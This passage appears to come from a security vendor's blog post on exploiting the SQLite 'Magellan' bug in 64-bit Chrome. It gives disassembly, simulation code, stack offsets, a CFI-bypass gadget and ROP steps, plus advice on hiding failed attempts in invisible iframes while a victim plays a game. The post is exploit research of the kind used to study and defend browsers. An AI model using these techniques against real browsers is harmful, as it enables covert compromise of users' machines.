.text:000000000404C6D2
.text:000000000404C6D2 locret_404C6D2:                         ; CODE XREF: sub_404C690+D↑j
.text:000000000404C6D2                 retn
.text:000000000404C6D2 sub_404C690     endp

This is not actually a perfect vfgadget, but it serves our purpose perfectly, and is simple enough to deal with. What this vfgadget gives us is an AAW primitive, because at the time of the call, $RDI points to an attacker-controlled payload. By doing a bit of puzzle matching, it is possible to create an AAW primitive that writes a controlled QWORD to an address of our choosing.
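The puzzle matching can be checked with a small simulation of the listing. The sketch below re-implements the gadget over a sparse memory model and lays out a payload following the offsets in the disassembly comments. The payload address, the stack slot and the pivot value are all made-up placeholders.

```javascript
// Byte-addressed, little-endian sparse memory used only for this simulation.
class SparseMemory {
  constructor() { this.bytes = new Map(); }
  write(address, value, size) {
    const v = BigInt.asUintN(size * 8, value);
    for (let i = 0; i < size; i++) {
      this.bytes.set(address + BigInt(i), Number((v >> BigInt(8 * i)) & 0xffn));
    }
  }
  read(address, size) {
    let v = 0n;
    for (let i = 0; i < size; i++) {
      v |= BigInt(this.bytes.get(address + BigInt(i)) || 0) << BigInt(8 * i);
    }
    return v;
  }
}

// Re-implementation of sub_404C690, following the listing step by step.
function simulateVfgadget(mem, rdi) {
  const rcx = mem.read(rdi + 0x18n, 8);
  let index = BigInt.asIntN(32, mem.read(rcx + 0xcn, 4));       // movsxd rdx, [rcx+0Ch]
  if (index >= BigInt.asIntN(32, mem.read(rcx + 0x8n, 4))) return 0; // jge
  let table = mem.read(rcx, 8);
  const first = mem.read(table + (index << 4n), 8);             // 16-byte entries
  mem.write(mem.read(rdi + 0x28n, 8), first, 8);                // mov [rdx], rax
  table = mem.read(rcx, 8);
  index = BigInt.asIntN(32, mem.read(rcx + 0xcn, 4));
  const second = BigInt.asIntN(32, mem.read(table + (index << 4n) + 8n, 4));
  mem.write(mem.read(rdi + 0x28n, 8) + 8n, second, 8);          // mov [rdx+8], rax
  mem.write(rcx + 0xcn, mem.read(rcx + 0xcn, 4) + 1n, 4);       // add dword [rcx+0Ch], 1
  return 1;
}

const PAYLOAD = 0x7f0000100000n;   // hypothetical address of the fake object ($RDI)
const RET_SLOT = 0x7f00dead0000n;  // hypothetical stack slot holding the return address
const PIVOT = 0x4242424242424242n; // placeholder for the stack pivot gadget address

const gadgetMemory = new SparseMemory();
gadgetMemory.write(PAYLOAD + 0x18n, PAYLOAD + 0x800n, 8);  // 0x18  => 0x800
gadgetMemory.write(PAYLOAD + 0x28n, RET_SLOT, 8);          // 0x28  => ret addr
gadgetMemory.write(PAYLOAD + 0x800n, PAYLOAD + 0x810n, 8); // 0x800 => 0x810
gadgetMemory.write(PAYLOAD + 0x808n, 1n, 4);               // dword 0x808 => 1
gadgetMemory.write(PAYLOAD + 0x80cn, 0n, 4);               // dword 0x80C => 0
gadgetMemory.write(PAYLOAD + 0x810n, PIVOT, 8);            // 0x810 => pivot
gadgetMemory.write(PAYLOAD + 0x818n, 0n, 4);               // dword 0x818 => 0

const gadgetResult = simulateVfgadget(gadgetMemory, PAYLOAD);
console.log(gadgetResult, gadgetMemory.read(RET_SLOT, 8).toString(16));
```

The simulation also shows why the gadget is not perfect: besides the intended QWORD, it overwrites the following 8 bytes and increments a counter inside the payload.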

Now this brings up the next question. What are we going to overwrite?
Because the entire binary is compiled with CFI, a function pointer would not be a good choice. Actually, the go-to method for bypassing CFI after gaining AAW is going for the stack return address. This is not possible on recent mobile platforms (Hello PAC and its soon-to-be-born companion, Memory Tagging), but the desktop counterpart, Intel CET, has not arrived yet, so the stack still remains a perfect and the easiest target.

This brings up the next problem of actually finding the stack. This is easy once AAR is achieved. The stack can be found by following a chain of pointers, and the return address location can be calculated from the leaked values. Our AAW target was the return address of the above vfgadget. Once the AAW is triggered, it writes an attacker-controlled value over the return address that the vfgadget was originally supposed to return to. When the vfgadget finishes executing, it returns into our stack pivot gadget and kick-starts the ROP chain. To find that return address, we needed to find the WebSQL Database thread’s stack. To find that stack address, we first searched for the stack address of Chrome’s Main Thread. Main Thread stack addresses are sprinkled across the main thread’s heap, which resides right behind the Chrome executable image in memory. Since this is the main thread’s heap, it is brk’d and grows right behind the Chrome image.

7f7b32c0e000-7f7b344a5000 r--p 00000000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344a5000-7f7b344a6000 r--p 01897000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344a6000-7f7b344c6000 r--p 01898000 08:01 18612380                   /opt/google/chrome/chrome
7f7b344c6000-7f7b3a9db000 r-xp 018b8000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3a9db000-7f7b3aa11000 rw-p 07dcd000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3aa11000-7f7b3afe9000 r--p 07e03000 08:01 18612380                   /opt/google/chrome/chrome
7f7b3afe9000-7f7b3b1ce000 rw-p 00000000 00:00 0

We heuristically searched for a value that looks like a stack address, and found the following.

// Main stack
Index[14F01] : 7fffda39d4c0
Index[18226] : 7fffda39c890
Index[18261] : 7fffda39e000
Index[18262] : 7fffda39c110
Index[18A34] : 7fffda39d658
Index[38B5E] : 7fffda39dff8

Index[14F01] : 7fffda39d4c0
Index[18226] : 7fffda39c890
Index[18261] : 7fffda39e000
Index[18262] : 7fffda39c090
Index[18A34] : 7fffda39d658
Index[38B5E] : 7fffda39dff8

Index[14F01] : 7fff11006e30
Index[18226] : 7fff11006200
Index[18261] : 7fff11007000
Index[18262] : 7fff11005a00
Index[18A34] : 7fff11006fc8
Index[38B5E] : 7fff11006ff8

...
...

It was found that certain stack addresses from the Main Chrome Thread lay at the same index in every run, even across reboots. The one with the lowest index was chosen, because it was probably stored during the earliest phases of Chrome execution, so it could be assumed to land there deterministically across different runs. Even if that’s not the case, we can use the AAR and do a heuristic search dynamically in JavaScript.
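Such a heuristic search might look like the sketch below. The address range used to decide what “looks like a stack address” is an assumption for x86-64 Linux, chosen so that the sample values above fall inside it. The function name and the input format (an array of already-leaked qwords) are hypothetical.

```javascript
// Hypothetical heuristic: treat any qword inside an assumed user-space stack
// range as a candidate. The bounds are an assumption, not taken from the exploit.
const STACK_RANGE_LOW = 0x7ffc00000000n;
const STACK_RANGE_HIGH = 0x7fffffffffffn;

function findStackCandidates(qwords) {
  const hits = [];
  qwords.forEach((value, index) => {
    if (value >= STACK_RANGE_LOW && value <= STACK_RANGE_HIGH) {
      hits.push({ index, value });
    }
  });
  return hits;
}

// Made-up heap contents mixing image, stack and thread-stack style values.
const leakedQwords = [0x7f7b3afe9000n, 0x7fffda39d4c0n, 0n, 0x7faef6ae1a28n, 0x7fff11006e30n];
for (const hit of findStackCandidates(leakedQwords)) {
  console.log(`Index[${hit.index.toString(16).toUpperCase()}] : ${hit.value.toString(16)}`);
}
```

Taking the first hit mirrors the choice described above of the candidate with the lowest index.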

Next, we searched for a WebSQL Stack address within the Main Stack.

// Database stack
Index[39AB] : 7faef6ae1a28
Index[39B6] : 7faef6ae1a10
Index[39B7] : 7faef6ae1a28

Index[39AB] : 7faef5d60a28
Index[39B6] : 7faef5d60a10
Index[39B7] : 7faef5d60a28
Index[3B21] : 7faef5d5ff00

Index[3AD9] : 7f94fc597a28
Index[3AE4] : 7f94fc597a10
Index[3AE5] : 7f94fc597a28
Index[3C4F] : 7f94fc596f00

...
...

The WebSQL stack index would change slightly between runs, so this was not a reliable way to leak the WebSQL stack. Perhaps this is because the Chrome environment changes slightly on each run based on the data saved on disk, or because different data received from Google servers on each run triggers a different sequence of function calls, or an alloca with a different size, nudging the WebSQL data on the stack around a little at a time. However, there is another, reliable way. We already have one of the main stack’s addresses leaked from the previous phase. This is probably the address of a stack variable used in a certain function’s stack frame. If the function that encompasses the leaked stack variable sits far enough down the stack, it is relatively free of the variance described earlier. This means that any functions called further down the stack are called in a deterministic fashion, each call lowering the stack by a fixed amount. As it so happens, the distance between the leaked Main Stack variable and the WebSQL stack address residing on the Main Stack is constant: 0x1768. By subtracting 0x1768 from the first leaked address, we get the location of the WebSQL stack address that we want to leak. The same concept applies to finding our target return address on the WebSQL stack. Subtracting 0x9C0 from the second leaked value yields the exact position of our target return address. Since we know the location of the return address, we can construct a COOP payload that will AAW a stack pivot gadget right on top of that address.
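The two-step offset arithmetic can be written down as a short sketch. `read64` is a hypothetical stand-in for the AAR, simulated here with a lookup table. The two constants are the ones quoted in the text and would only apply to that specific build.

```javascript
// Sketch of the two-step lookup. `read64` stands in for the real AAR; the
// offsets are the build-specific constants quoted in the text.
const MAIN_TO_WEBSQL_POINTER = 0x1768n;
const WEBSQL_TO_RETURN_SLOT = 0x9c0n;

function locateReturnAddressSlot(read64, mainStackLeak) {
  // Step 1: the main stack holds a pointer into the WebSQL thread's stack.
  const webSqlStackValue = read64(mainStackLeak - MAIN_TO_WEBSQL_POINTER);
  // Step 2: the target return address sits a fixed distance below it.
  return webSqlStackValue - WEBSQL_TO_RETURN_SLOT;
}

// Simulated address space using sample values from the listings above.
const mainStackLeak = 0x7fffda39d4c0n;
const simulatedStack = new Map([
  [mainStackLeak - MAIN_TO_WEBSQL_POINTER, 0x7faef6ae1a28n],
]);
const simulatedRead64 = (address) => simulatedStack.get(address);

const returnSlot = locateReturnAddressSlot(simulatedRead64, mainStackLeak);
console.log(returnSlot.toString(16)); // 7faef6ae1068
```

Only one AAR read is needed between the two subtractions, which keeps this step cheap compared with a heuristic scan.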

The entire process is illustrated below.

This is why we need exactly one gadget to control $RIP: we can use the AAR to find the return address’s location within the stack. From here, it is just standard ROP to execve or system.

The Chrome executable is huge, at 130MB. This is because it is statically compiled, so every library other than the standard ones is included in the Chrome executable. Therefore, there is no shortage of ROP gadgets to choose from. The only problem is that extracting the gadgets can take a very long time. On the first round of ROP gadget extraction, we weren’t able to find a suitable stack pivot gadget. This is because the ROP stack is littered with values from the AAW vfgadget, which are needed to make the AAW work properly. The stack pivot needs to dodge all of those values and land on empty slots within the ROP stack. This led us to run the ROPgadget tool with --depth=20, which ran for 48 hours on the 130MB binary inside a virtual machine. While ROPgadget was running, we casually went through the remaining vfgadget list, in the hope of finding another relatively simple AAW vfgadget that does not litter the ROP stack too much. During that process, we found a completely different way to bypass the CFI.

Bypassing CFI by gaining direct code execution

It turns out that the statement “CFI is universally applied to all indirect function calls” is false. This was realized after discovering the following gadget.

.text:0000000001C5C620 sub_1C5C620     proc near               ; CODE XREF: .text:loc_19B0F58↑j
.text:0000000001C5C620                 mov     rcx, [rdi+20h]
.text:0000000001C5C624                 mov     rax, [rdi+30h]
.text:0000000001C5C628                 add     rax, [rdi+28h]
.text:0000000001C5C62C                 test    cl, 1
.text:0000000001C5C62F                 jz      short loc_1C5C639
.text:0000000001C5C631                 mov     rdx, [rax]
.text:0000000001C5C634                 mov     rcx, [rdx+rcx-1]
.text:0000000001C5C639
.text:0000000001C5C639 loc_1C5C639:                            ; CODE XREF: sub_1C5C620+F↑j
.text:0000000001C5C639                 mov     rsi, [rdi+38h]
.text:0000000001C5C63D                 mov     rdi, rax
.text:0000000001C5C640                 jmp     rcx
.text:0000000001C5C640 sub_1C5C620     endp

We were awestruck when we discovered this vfgadget. It completely dodges the CFI, making a direct call to a virtual function with no checks at all. What is even more remarkable is that this gadget also provides $RDI and $RSI with a completely clean ROP stack to work with. It’s as if someone left it there with the intention of “Use THIS GADGET to bypass the CFI *wink*”. This vfgadget is clearly the winner of all vfgadgets: the Golden Vfgadget that bypasses CFI in one fatal blow. We give our sincere appreciation to whoever contributed to the making of this vfgadget.

All jokes aside, the only plausible explanation for why this function was left out is that it operates on tagged pointers. It seems that the current CFI implementation baked into the compiler gets easily confused when direct arithmetic is performed on pointer values. This is shown on line 8 in the above listing (mov rcx, [rdx+rcx-1]). Thanks to this vfgadget, we can jump directly to the stack pivot gadget and ROP from there, entirely skipping the AAW. In our exploit, the previous AAW method was used after finding the appropriate stack pivot gadget, but this one would have been much preferable, had it been discovered earlier.
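To make the data flow of the gadget easier to follow, here is a rough C model of what the listing computes. It is a sketch of the assembly above, not Chrome source code: the names gadget_state, load64 and model_gadget are hypothetical, and the comments only restate the instructions. The shape resembles the way a C++ pointer-to-member-function call is lowered on x86-64 Linux, with the low bit of the pointer acting as the tag, but that reading is our assumption.

```c
#include <stdint.h>
#include <string.h>

/* Register state at the final `jmp rcx`. */
typedef struct {
    uint64_t target; /* rcx: address that control is transferred to */
    uint64_t rdi;    /* first argument seen by the target */
    uint64_t rsi;    /* second argument seen by the target */
} gadget_state;

/* Read 8 bytes from an address, like a `mov reg, [addr]`. */
static uint64_t load64(uint64_t addr) {
    uint64_t value;
    memcpy(&value, (const void *)(uintptr_t)addr, sizeof value);
    return value;
}

/* Model of sub_1C5C620; `rdi` points at an attacker-controlled object. */
gadget_state model_gadget(uint64_t rdi) {
    uint64_t rcx = load64(rdi + 0x20);                      /* mov rcx, [rdi+20h] */
    uint64_t rax = load64(rdi + 0x30) + load64(rdi + 0x28); /* mov/add rax */
    if (rcx & 1) {                                          /* test cl, 1 */
        uint64_t rdx = load64(rax);                         /* mov rdx, [rax] */
        rcx = load64(rdx + rcx - 1);                        /* mov rcx, [rdx+rcx-1] */
    }
    gadget_state out = { rcx, rax, load64(rdi + 0x38) };    /* rsi, rdi, jmp rcx */
    return out;
}
```

With an even value at offset 0x20, the model returns that value unchanged as the jump target, which is the case an attacker would presumably use to reach a stack pivot directly. With the low bit set, the target is fetched through one extra table lookup.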

Making a Stealth Exploit by abusing Chrome’s Site Isolation

Chrome offers a mitigation called Site Isolation. Here is the description of Site Isolation, borrowed from the Chromium webpage.

Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like Spectre/Meltdown. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access.

In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called universal cross-site scripting (UXSS). Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur.

There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place.

To summarize, Site Isolation mitigates CPU side-channel attacks and protects against UXSS logic bugs. However, it does not protect against gaining UXSS after gaining remote code execution with a renderer bug. Site Isolation is also interesting from another perspective: the exploiter’s point of view. Here’s another quote borrowed from the site.

Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that pages from different websites are always put into different processes, each running in a sandbox that limits what the process is allowed to do. It will also make it possible to block the process from receiving certain types of sensitive data from other sites. As a result, a malicious website will find it more difficult to steal data from other sites, even if it can break some of the rules in its own process.

The important part is the guarantee that pages from different websites are always put into different processes. This means that every frame that opens a site different from its parent frame runs in a separate process. This can be observed with a little experimentation.

<h1>This is the parent Frame</h1>
 
<iframe src="http://externalist1.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist2.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist3.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist4.com:8080/innocent.html" width=100 height=100></iframe>
<iframe src="http://externalist5.com:8080/innocent.html" width=100 height=100></iframe>
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
6
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
7
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
8
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
9
➜  site_isolation_test ps aux | grep chrome | grep -v grep | wc -l
10

As more iframes from different sites are added, more processes pop up. This is interesting from an exploitation point of view. What happens if an iframe running in a different process crashes?

It does not take down the parent window along with it. It just crashes the process containing the iframe. Does it work with multiple iframes?

Confirmed. What if the iframe is barely visible?

The parent frame lives, and there is no visible indication on the screen that the child iframes crashed.

What this provides to an exploiter is three things.

  1. On every failed exploit attempt, a new iframe can be launched. This lets the exploit retry a practically unlimited number of times.
  2. If the iframe is vanishingly small, there is no indication on the screen of exploit failure. The ‘Aw, Snap!’ page will be contained within the invisible iframe.
  3. Each iframe launches a new process, and all exploit activity will be contained within that process. Whatever busy activity happens in the parent frame will not affect the child frame.

These are great characteristics for an exploit. All of these factors help enhance the reliability of an exploit and make it resilient to failures.

For our exploit, since it runs for a fair amount of time, we simulated a scenario where the victim is lured into playing a game of Zelda while the exploit runs in an iframe in the background. The developer console is opened in order to show the exploit working behind the scenes.


The exploit works on all Ubuntu versions, because all exploit primitives are based on the Chrome binary itself and do not rely on any offsets from the system libraries. In order to actually pop the calculator, Chrome needs to be run with the --no-sandbox flag. Otherwise, the exploit needs to be packed with a reflective ELF payload armed with a sandbox escape in order to pop the calculator.

The entire exploit code can be found on our github.

Increasing Speed and Reliability

We will first talk about reliability, because everything about it has been covered in the previous sections. In order to increase reliability, steps should be taken to find the sources of failure and fix them. The sources of unreliability, and ways to avoid them, have been discussed at each stage. This obviously doesn’t cover all sources of failure. While fixing them one by one, new and completely unexpected issues will pop up and be added to the to-fix list. It would be wise to fix just the major sources of failure and leave the minor ones as is, until reliability exceeds 80%. Then, let the Site Isolation technique described above handle the remaining failures by retrying. That is a good tradeoff between creating a good enough exploit and the time invested in increasing reliability.

Now let’s talk about reducing the execution time of the exploit. The major source of delay is obviously the spraying phase. This has to be eliminated to increase speed. But spraying is an essential requirement for the exploit. How would it be possible to OOB write to a target object that is 2GB away from the source object without spraying the heap? The answer is that we keep spraying, but spray in an efficient way. How is this possible?

Let’s look at the following example.

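#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void){
    unsigned long size = 0x80000000;   /* 2GB per allocation */
    unsigned char *chunk;
    int i;

    for(i=0; i<2; i++){
        chunk = malloc(size);
        if(chunk == NULL){             /* can fail if overcommit is restricted */
            perror("malloc");
            return 1;
        }
        printf("chunk : %p\n", (void *)chunk);
        memset(chunk, 1, 0x100);       /* touch only the first 0x100 bytes */
    }

    printf("done!\n");
    return 0;
}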
➜  malloc_test head /proc/19945/maps
00400000-00401000 r-xp 00000000 08:01 37357724                           /home/ex/testyo/malloc_test/test
00600000-00601000 r--p 00000000 08:01 37357724                           /home/ex/testyo/malloc_test/test
00601000-00602000 rw-p 00001000 08:01 37357724                           /home/ex/testyo/malloc_test/test
7fb5cf0fa000-7fb6cf0fc000 rw-p 00000000 00:00 0
7fb6cf0fc000-7fb6cf2ba000 r-xp 00000000 08:01 57675976                   /lib/x86_64-linux-gnu/libc-2.19.so

➜  malloc_test ./time_script ./test
chunk : 0x7f9770d4e010
chunk : 0x7f96f0d4d010
done!
1438 microsecond elapsed

The results show that even though the program successfully allocated 4GB of memory, it took only about 1.4 milliseconds to complete. This is because Linux uses an optimistic memory allocation strategy: the memory is allocated, but it is not backed by physical pages until data is actually written to it. More importantly, since only 0x200 bytes are written across the 4GB of chunks, the time that would be spent writing data to the heap is saved, while a huge amount of heap is still allocated. This makes it possible to spray the heap very quickly, without writing actual data to it. This is a great primitive, because the 2GB heap spray that our OOB write jumps over does not need to contain actual data; it only needs to occupy space on the heap. All we need to do is find such a primitive.
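The time_script helper used above is not shown in this post. As a rough stand-in, the measurement can be folded into a small C helper that allocates a region, writes only a prefix of it, and reports the elapsed time. The function name time_sparse_alloc is hypothetical, and the numbers it returns depend on the machine and its overcommit settings.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Allocate `size` bytes, write only the first `touched` bytes, and return
 * the elapsed time in microseconds. Returns -1 if `touched` exceeds `size`
 * or if the allocation fails. */
int64_t time_sparse_alloc(size_t size, size_t touched) {
    struct timespec start, end;

    if (touched > size) {
        return -1;
    }
    clock_gettime(CLOCK_MONOTONIC, &start);
    /* volatile keeps the compiler from optimizing the allocation away */
    unsigned char *volatile chunk = malloc(size);
    if (chunk == NULL) {
        return -1;
    }
    memset(chunk, 1, touched); /* only these bytes get backed by physical pages */
    clock_gettime(CLOCK_MONOTONIC, &end);
    free(chunk);

    return (int64_t)(end.tv_sec - start.tv_sec) * 1000000
         + (int64_t)(end.tv_nsec - start.tv_nsec) / 1000;
}
```

Calling time_sparse_alloc(0x80000000, 0x100) and then time_sparse_alloc(0x80000000, 0x80000000) on the same machine should show the gap between reserving address space and actually filling it, provided enough memory is available for the second call.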

In the course of building the exploit, such a primitive was not actively searched for. However, even a short glance at the SQLite commit logs reveals a wealth of heap spray candidates to choose from, and some of them could very well meet the conditions described above.

SQLite is not the only place to find such primitives. Since the TCMalloc heap is shared by all threads and managed by the Central Cache, heap sprays occurring from any other thread can make good candidates. Spraying in Thread 1 and then spraying in Thread 2 will place the chunks from Thread 2 adjacent to the ones sprayed in Thread 1. There will be a very small gap of a couple of pages, but they will be pretty close to each other. Therefore, any heap spray from any functionality in Chrome that is backed by malloc/new will make a good candidate. Usually, the best places to look for such heap sprays are components that parse complex formats. Prime candidates would be font or media parsing functionality. Finding this new heap spray primitive, which could place arbitrary data on the heap, would fill in the missing piece of the alternative exploitation strategy described in Stage 10.

Before ending the blogpost, let’s talk about how to embrace these new primitives, and build a new exploitation strategy.

The new primitives will be named P1 and P2 respectively. P1 is a primitive that creates a heap chunk of any size without having to fill its entire content. P2 is a primitive that creates a heap chunk of any size and fills it with arbitrary attacker-controlled content. In order to refine the exploit strategy, the fts3 root node that contains our OOB chunk for apple needs to be refined.

static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                         /* Return code of various sub-routines */
  char *pNext;                    /* Cursor variable */
  int nPrefix;                    /* Number of bytes in term prefix */
  int nSuffix;                    /* Number of bytes in term suffix */

  // snipped for brevity

  pNext += fts3GetVarint32(pNext, &nPrefix);
  pNext += fts3GetVarint32(pNext, &nSuffix);
  if( nPrefix<0 || nSuffix<=0
   || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
  ){
    return FTS_CORRUPT_VTAB;
  }

  if( nPrefix+nSuffix>pReader->nTermAlloc ){
    int nNew = (nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }

  rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
  if( rc!=SQLITE_OK ) return rc;

  memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);
  pReader->nTerm = nPrefix+nSuffix;
  pNext += nSuffix;
  pNext += fts3GetVarint32(pNext, &pReader->nDoclist);

The vulnerable function is also pasted above for reference.
Term 1 is the same. Term 2 has been updated to reallocate the apple chunk into a 2GB chunk. The check on line 21 (nPrefix+nSuffix>pReader->nTermAlloc) will be (0x3FFFC000 + 1) > 0, which makes it enter the if clause and reallocate the chunk based on the calculation on line 22 (nNew = (nPrefix+nSuffix)*2), yielding a size slightly less than 2GB. Let’s say, 1.9GB. Afterwards, the memcpy merely copies 1 byte, “A”, into the middle of the 1.9GB chunk. This eliminates nearly all of the memcpy time, while still allocating a huge 1.9GB chunk. The vulnerability is not actually triggered yet; Term 2 only serves to relocate the 0x10 byte apple chunk into a 1.9GB chunk. Next, Term 3 is parsed and the bug is triggered the same way it was in the original exploitation strategy. Since (0x7FFFFFFF + 1) is a negative value, the check on line 21 is bypassed and execution runs straight to the memcpy. The memcpy will OOB write at an address that is 0x7FFFFFFF bytes away from the start of the 1.9GB chunk, the same way it did in the previous stages. The only difference is that this time the apple chunk is not a 0xa00 chunk but a 1.9GB chunk.
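The integer arithmetic behind Term 2 and Term 3 can be checked with a small C sketch. The helper names are hypothetical. The real code uses plain int, where signed overflow is undefined behavior in C; the sketch performs the addition in unsigned arithmetic and converts back, which reproduces the two’s-complement wraparound seen in practice on x86-64 with common compilers.

```c
#include <stdint.h>

/* 32-bit signed addition with two's-complement wraparound. */
int32_t wrap_add32(int32_t a, int32_t b) {
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* Mirrors the check `nPrefix+nSuffix > pReader->nTermAlloc`. */
int needs_realloc(int32_t nPrefix, int32_t nSuffix, int32_t nTermAlloc) {
    return wrap_add32(nPrefix, nSuffix) > nTermAlloc;
}

/* Mirrors the size calculation `nNew = (nPrefix+nSuffix)*2`. */
int32_t new_alloc_size(int32_t nPrefix, int32_t nSuffix) {
    return (int32_t)((uint32_t)wrap_add32(nPrefix, nSuffix) * 2u);
}
```

For Term 2, new_alloc_size(0x3FFFC000, 1) is 0x7FFF8002, just under 2GB. For Term 3, wrap_add32(0x7FFFFFFF, 1) wraps to INT32_MIN, so needs_realloc returns 0 for any non-negative nTermAlloc and the memcpy runs against the existing chunk.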

The new exploitation strategy will be like the following.

This is the new refined exploit strategy to increase speed. Since most of the heap spraying is done with P1, which is lightning fast and doesn’t actually fill in any heap data, the entire spraying and probing process until Stage 7 will probably be reduced down to less than 10 seconds. This will actually make the exploit practical, and deployable in the real world. We haven’t actually gone down this route due to time constraints, but we present it here in case anyone wants to play with the concept.

Another thing worth mentioning is that this tactic could probably have been used to exploit Chrome on Windows. This is because apple no longer lives in the Low Fragmentation Heap, but in a separate heap allocated by NtAllocateVirtualMemory. This makes it possible to have the 1.9GB chunk allocated at a relatively fixed location (which moves around a little due to the guard page size), without being subject to the randomization of the LFH. To eliminate even that slight randomization, the Variable Size Allocation subsegment would also make a good place to put apple. It would have been interesting to see this bug actually being used to compromise Chrome during Pwn2Own.

Conclusion

Finally, in terms of reliable N-Day exploits for Chrome, there are much better bugs that could achieve speed and reliability, due to the bug characteristics. The prime candidates are bugs that occur in the V8 JIT engine, such as _tsuro’s excellent V8 bug in Math.expm1. Our N-Day feed provides in-depth analysis and exploits for other kinds of V8 JIT bugs. The Exodus nDay subscription can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests, even when critical details about public vulnerabilities have been obscured (like the Magellan bug) or when they simply do not exist.

The post Exploiting the Magellan bug on 64-bit Chrome Desktop appeared first on Exodus Intelligence.
